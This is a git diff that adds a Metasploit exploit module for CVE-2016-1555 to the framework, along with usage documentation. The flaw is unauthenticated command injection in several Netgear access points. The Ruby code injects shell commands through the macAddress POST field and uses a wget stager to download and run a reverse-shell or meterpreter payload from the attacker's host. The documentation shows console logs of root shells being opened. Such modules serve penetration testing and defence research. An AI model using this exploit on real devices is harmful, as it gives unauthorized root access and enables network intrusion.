diff --git a/documentation/modules/exploit/linux/http/netgear_unauth_exec.md b/documentation/modules/exploit/linux/http/netgear_unauth_exec.md new file mode 100644 index 0000000000..b062626cc3 --- /dev/null +++ b/documentation/modules/exploit/linux/http/netgear_unauth_exec.md @@ -0,0 +1,108 @@ +## Description + + +The module leverages an unauthenticated arbitrary command execution vulnerability in Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0. The vulnerability occurs within how the router handles POST requests from (1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php. The vulnerability was discovered by Daming Dominic Chen, creator of FIRMADYNE (https://github.com/firmadyne/firmadyne). + +## Vulnerable Application + + + 1. Start msfconsole + 2. Do : `use exploit/linux/http/netgear_unauth_exec` + 3. Do : `set RHOST [RouterIP]` + 4. Do : `set SRVHOST [Your server's IP]` if your payload isn't being hosted on another system + 5. Do : `set LHOST [Your IP]` + 6. Do : `set MAC_ADDRESS [12 digit number]` if you want some specific MAC address instead of a random one + 7. Do : `set TARGETURI [target URI]` if you want to target another URI instead of the default `boardDataWW.php` + 8. Do : `set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp` if you want meterpreter session + 9. Do : `exploit` + 10. If router is vulnerable, payload should be dropped via wget (the default HTTP stager) and executed, and you should obtain a session + + +## Example with default payload (linux/mipsbe/shell_reverse_tcp) + +``` +msf > use exploit/linux/http/netgear_unauth_exec +msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100 +RHOST => 192.168.200.100 +msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99 +LHOST => 192.168.200.99 +msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99 +SRVHOST => 192.168.200.99 +msf exploit(linux/http/netgear_unauth_exec) > exploit + +[*] Started reverse TCP handler on 192.168.200.99:4444 +[*] Using URL: http://192.168.200.99:8080/Ekvrz8LbW +[*] Client 192.168.200.100 (Wget) requested /Ekvrz8LbW +[*] Sending payload to 192.168.200.100 (Wget) +[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56852) at 2018-10-09 20:24:56 +0630 +[*] Command Stager progress - 118.97% done (138/116 bytes) +[*] Server stopped. + +uname -a +Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown +id +uid=0(root) gid=0(root) + +``` + +## Example with meterpreter (linux/mipsbe/meterpreter/reverse_tcp) + +``` +msf > use exploit/linux/http/netgear_unauth_exec +msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100 +RHOST => 192.168.200.100 +msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp +PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp +msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99 +LHOST => 192.168.200.99 +msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99 +SRVHOST => 192.168.200.99 +msf exploit(linux/http/netgear_unauth_exec) > exploit + +[*] Started reverse TCP handler on 192.168.200.99:4444 +[*] Using URL: http://192.168.200.99:8080/x6ZYzUoe9x7IR +[*] Client 192.168.200.100 (Wget) requested /x6ZYzUoe9x7IR +[*] Sending payload to 192.168.200.100 (Wget) +[*] Sending stage (1108408 bytes) to 192.168.200.100 +[*] Meterpreter session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56854) at 2018-10-09 20:26:39 +0630 +[*] Command Stager progress - 118.33% done (142/120 bytes) +[*] Server stopped. + +meterpreter > sysinfo +Computer : 192.168.200.100 +OS : (Linux 2.6.32.70) +Architecture : mips +BuildTuple : mips-linux-muslsf +Meterpreter : mipsbe/linux +meterpreter > getuid +Server username: uid=0, gid=0, euid=0, egid=0 +meterpreter > + +``` + +## Example using some other vulnerable URI (boardDataNA.php) +``` +msf > use exploit/linux/http/netgear_unauth_exec +msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100 +RHOST => 192.168.200.100 +msf exploit(linux/http/netgear_unauth_exec) > set TARGETURI boardDataNA.php +TARGETURI => boardDataNA.php +msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99 +LHOST => 192.168.200.99 +msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99 +SRVHOST => 192.168.200.99 +msf exploit(linux/http/netgear_unauth_exec) > exploit + +[*] Started reverse TCP handler on 192.168.200.99:4444 +[*] Using URL: http://192.168.200.99:8080/zlJyAS8F1As +[*] Client 192.168.200.100 (Wget) requested /zlJyAS8F1As +[*] Sending payload to 192.168.200.100 (Wget) +[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56856) at 2018-10-09 20:28:41 +0630 +[*] Command Stager progress - 118.64% done (140/118 bytes) +[*] Server stopped. + +uname -a +Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown +id +uid=0(root) gid=0(root) +``` diff --git a/modules/exploits/linux/http/netgear_unauth_exec.rb b/modules/exploits/linux/http/netgear_unauth_exec.rb new file mode 100644 index 0000000000..341842d7c3 --- /dev/null +++ b/modules/exploits/linux/http/netgear_unauth_exec.rb @@ -0,0 +1,105 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Netgear Devices Unauthenticated Remote Command Execution', + 'Description' => %q{ + From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php, + (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in + Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, + WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute + arbitrary commands. + }, + 'Author' => + [ + 'Daming Dominic Chen ', # Vuln discovery + 'Imran Dawoodjee ' # MSF module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2016-1555'], + ['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'], + ['PACKETSTORM', '135956'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112'] + ], + 'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112 + 'Privileged' => true, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'Payload' => {}, + 'DefaultOptions' => { + 'CMDSTAGER::FLAVOR' => 'wget', + 'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp', + 'WfsDelay' => 10 }, + 'Targets' => [['Automatic', { }]], + 'CmdStagerFlavor'=> %w{ echo printf wget }, + 'DefaultTarget' => 0 + )) + register_options( + [ + OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']), # boardDataWW.php + OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', Rex::Text.rand_text_hex(12)]) + ]) + end + + # check for vulnerability existence + def check + fingerprint = Rex::Text.rand_text_alpha(12) # If vulnerability is present, we will get this back in the response + res = execute_command("echo #{fingerprint}") # the raw POST response + + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + unless res.code == 200 + return CheckCode::Safe + end + + unless res.get_html_document.at('input').to_s.include? fingerprint + return CheckCode::Safe + end + + CheckCode::Vulnerable + end + + # execute a command, or simply send a POST request + def execute_command(cmd, opts = {}) + vars_post = { + 'macAddress' => "#{datastore['MAC_ADDRESS']};#{cmd};", + 'reginfo' => '1', + 'writeData' => 'Submit' + } + + send_request_cgi({ + 'method' => 'POST', + 'headers' => { 'Connection' => 'Keep-Alive' }, + 'uri' => normalize_uri(target_uri.path), + 'vars_post' => vars_post + }) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!") + end + + # the exploit method + def exploit + #run a check before attempting to exploit + unless [CheckCode::Vulnerable].include? check + fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!' + end + + execute_cmdstager(linemax: 2048) # maximum 130,000 + end + +end +